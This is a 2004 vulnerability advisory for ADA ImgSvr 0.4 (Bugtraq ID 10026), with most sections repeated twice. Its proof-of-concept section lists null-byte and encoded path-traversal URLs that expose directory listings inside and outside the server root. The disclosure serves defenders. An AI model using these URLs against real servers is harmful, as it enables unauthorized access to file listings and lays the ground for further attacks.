ADA IMGSVR Remote Directory Listing Vulnerability
BID:10026
Info
ADA IMGSVR Remote Directory Listing Vulnerability
| Bugtraq ID: | 10026 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 01 2004 12:00AM |
| Updated: | Apr 01 2004 12:00AM |
| Credit: | Discovery of this issue is credited to "Donato Ferrante" <[email protected]> and Dr_insane <[email protected]>. |
| Vulnerable: |
ADA ImgSvr 0.4 |
| Not Vulnerable: | |
Discussion
ADA IMGSVR Remote Directory Listing Vulnerability
A vulnerability has been reported in the ImgSvr server software that may allow a remote user to the disclose root directory listings. This issue has also been reported to allow for listing of directories that reside outside the server root as well.
An attacker may leverage this issue to gain access to sensitive information by disclosing directory listings; information disclosed in this way could lead to further attacks against the target system.
A vulnerability has been reported in the ImgSvr server software that may allow a remote user to the disclose root directory listings. This issue has also been reported to allow for listing of directories that reside outside the server root as well.
An attacker may leverage this issue to gain access to sensitive information by disclosing directory listings; information disclosed in this way could lead to further attacks against the target system.
Exploit / POC
ADA IMGSVR Remote Directory Listing Vulnerability
There is no exploit required to leverage this issue. The following proof of concept has been provided:
For listing directories inside the server root (provided by Donato Ferrante):
http://www.example.org:1234/%00/
http://www.example.org:1234/someDirectory%00/
http://www.example.org:1234/someDirectory/%00/
For listing directories outside of the server root (provided by Dr_insane):
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/
There is no exploit required to leverage this issue. The following proof of concept has been provided:
For listing directories inside the server root (provided by Donato Ferrante):
http://www.example.org:1234/%00/
http://www.example.org:1234/someDirectory%00/
http://www.example.org:1234/someDirectory/%00/
For listing directories outside of the server root (provided by Dr_insane):
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/
Solution / Fix
ADA IMGSVR Remote Directory Listing Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
ADA IMGSVR Remote Directory Listing Vulnerability
References:
References:
- ImgSvr Home Page (ADA)
- Index viewing in imgSvr 0.4 ("Donato Ferrante"
)